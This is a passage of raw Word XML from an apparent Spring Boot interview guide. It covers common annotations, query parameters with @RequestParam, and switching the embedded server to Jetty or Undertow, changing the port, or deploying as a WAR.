    </w:p>
    <w:p w14:paraId="4006E8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s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642067E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List&lt;User&gt; getUsers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F38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Service.getAllUsers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766C29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D7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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1441D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for automatic dependency injection. Spring will automatically inject the correct bean based on the type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E79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can use it on fields, constructors, or setters to inject dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3204474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692F4E6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serService userService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF969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Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA007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inject values into Spring beans from property files (application.properties or application.yml).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485256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Often used to inject values such as strings, numbers, or configurations from the application’s configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8905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app.name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E574A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String appName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC8BF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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F223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Defines a bean in a @Configuration class. This is used to explicitly declare a bean within the Spring application context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5340B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When you want to define a custom bean or a third-party class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E77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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9BA0C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MyService myService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C72EE3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2028C5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71DBD6C"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0. @Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF8CFA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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to define an entity class in JPA (Java Persistence API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2643C1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is used for mapping Java objects to database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1062C79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8904E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130FA3F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5A1200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FAF59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04FA76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A45C9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1. @Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1780EF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pecifies the table to be used for mapping an entity. It’s typically used with @Entity to specify the table name explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48751C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Allows you to configure a custom table name for the entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE4519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051C15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able(name = "users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216660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6FA159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fields and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF982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FD69D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2. @RequestParam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2D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bind request parameters to method parameters in controller methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5AB62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to extract query parameters from the request URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B3F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reet")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692CDD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reet(@RequestParam String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EF3F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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6959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9D9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3. @PathVariable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324726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extract values from the URL path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9E9E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in RESTful API paths to extract variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630A6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235FDEB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PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0456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ID: " + id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA39DB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E5734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4. @Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27836A4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class as a Spring bean that is automatically detected during classpath scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7791856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Used to declare a bean in the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B6B4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03E33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D5CE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2F934B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C46A2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5. @Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A4A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service classes that contain business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B2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service class, which is typically used for encapsulating business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50114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1CDC04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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D576C0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6DD8B7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06F9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6. @Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA972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data access layer components like DAOs (Data Access Objects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F1B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DAO class, which is responsible for interacting with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F38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1EEE6CB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Repository {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE2E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pository logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE0AC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33C5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7. @EnableAutoConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723769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used to enable Spring Boot’s auto-configuration feature, which automatically configures various Spring components based on the application’s classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC86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It is typically included as part of @SpringBootApplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115599F"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8. @EnableAspectJAutoProxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C15B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Enables Spring AOP (Aspect-Oriented Programming) support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F799EC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Required to enable aspect-oriented programming in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD83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spectJAutoProxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024050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84D8B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opConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FDC9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AOP configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10266D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D43220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9. @Transactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037D94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method or class to be transactional, meaning all database operations inside it will be committed or rolled back together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3B0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used on service methods that interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C811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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5FAF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transferFunds(Account fromAccount, Account toAccount, Double amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E82C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transfer funds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560033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0BD9E3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56A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520" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A9DB7" w14:textId="14AFAC8E" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00A7515E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="597" w:name="_Toc197867811"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the query parameter</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="597"/>
    </w:p>
    <w:p w14:paraId="7F401902" w14:textId="4A589F31"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query parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ructure of Query Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD650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query parameter consists of two parts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DF9D2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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The name of the parameter (e.g., name, id, page).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589CE6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alue</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The value of the parameter (e.g., John, 123, 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648023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Query Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638977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URL with query parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC132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s://example.com/search?query=Spring&amp;sort=asc&amp;page=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCBA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4380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query</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Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is its value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B008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asc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is its value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703903F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e</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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is its value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A2BF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age of Query Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5497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ltering</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To filter data on the server, such as searching for items based on certain criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CCA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ination</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Often used for pagination in lists (e.g., page=2 for the second page of results).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F6C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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To specify how the results should be sorted (e.g., sort=desc).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05520D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ate</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To maintain some state information across requests, like an authentication token or session ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF6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in Spring Boot Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DFC2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query parameters in a Spring Boot controller using @RequestParam.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133F9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2057AC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archController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67435EC2" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E972E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search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E22E5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earch(@RequestParam String query, @RequestParam String sort, @RequestParam int page) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818AC4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 + ", sorting by " + sort + " on page " + page;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594FB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F8603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51EDB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send a request like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39199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search?query=Spring&amp;sort=asc&amp;page=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269155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output will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30790B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earching for Spring, sorting by asc on page 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAFD308" w14:textId="47D6ADE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521" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D95DD" w14:textId="690F605B" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD1731">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="598" w:name="_Toc197867812"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to change the server in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="598"/>
    </w:p>
    <w:p w14:paraId="502DB6B0" w14:textId="67B8E53D"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you can change the embedded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by configuring the application properties or by adding specific dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C65D8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hange the Embedded Server via application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF95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Boot uses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as the default embedded server. To change it to another server lik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you need to add the respective dependency and configure it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10043CB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Jetty:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D998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follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5653D0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clude the Tomcat dependency and add the Jetty dependency in pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68757C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E2416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4982CCC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39F7FF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7A01B9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F2F5F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77BDDD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75F995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02EF3C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EE184D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1CB20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758F52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166082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F8A0713" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3E17C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Jetty --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122215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096967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C1809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jetty&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7131A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7F024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72AEE1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3A10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1DA137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4CD9655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4B125C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7F114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jetty'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C6540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F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Jetty instead of Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1F67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Undertow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948F65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follow a similar process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2044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3ECC52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5D539F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6C1B4FA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ECBF5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1A4EA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EB57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21F4E7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4B580F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C4C74B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6C2672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19F490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5645960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699B408" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119C6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 Add Undertow --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E069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43FC9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E10F9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undertow&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C51AD4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4715A1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0B99909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1D4C330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0F4EE6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60DDE9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3C6426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92CA52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undertow'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C9592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76E3B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Undertow instead of Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA8FB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hange the Server Port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC877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hange the port on which the Spring Boot application listens, you can set the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server.port</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> property in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9DA51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properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D469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081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0727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yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70955CE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A2A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rt: 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD441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make the application listen on port 8081 instead of the default port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFD54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grammatically Change the Embedded Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62070D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programmatically change the server in the SpringApplication by setting the desired server type in the SpringApplication context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4391F4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SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5159167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support.SpringBootServletInitializer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BEA1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context.AnnotationConfigServletWebApplicationContext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6943AB29" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640A38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SpringApplication extends SpringBootServletInitializer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772898AB" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B75C6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2046D8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 app = new SpringApplication(CustomSpringApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD47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t a specific server type, e.g., Jetty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A266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setWebApplicationType(WebApplicationType.SERVLET);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3C20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run(args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA9B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CCA8D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A56EB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External Server (Traditional Deployment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295D6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want to deploy the application on an external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Wildfly</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can generate a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file instead of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69481D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hange the packaging in pom.xml to WAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD0EA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ackaging&gt;war&lt;/packaging&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018F9B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nsure your main class extends SpringBootServletInitializer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F8B8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3009D6C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extends SpringBootServletInitializer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048049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890DE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78A8A8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95E1134" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C701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58172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SpringApplicationBuilder configure(SpringApplicationBuilder application) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0223927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plication.sources(MyApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6D67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64D86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72E62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Build the WAR file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59783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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F269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ploy the WAR file on the server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., deploy on Tomcat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C524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ay, you can run your Spring Boot application on an external server instead of the embedded one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C3DE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56AFCF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ange the server in Spring Boot by adding the necessary dependencies (like Jetty or Undertow) and excluding the default embedded Tomcat server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C712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onfigure the server port using server.port property in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D292C6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deployment, change the packaging to WAR and extend SpringBootServletInitializer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0F81E" w14:textId="36148FF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522" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="501ED36D" w14:textId="460AD4BC" w:rsidR="00D05936" w:rsidRPr="00CE4B95" w:rsidRDefault="00F029AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
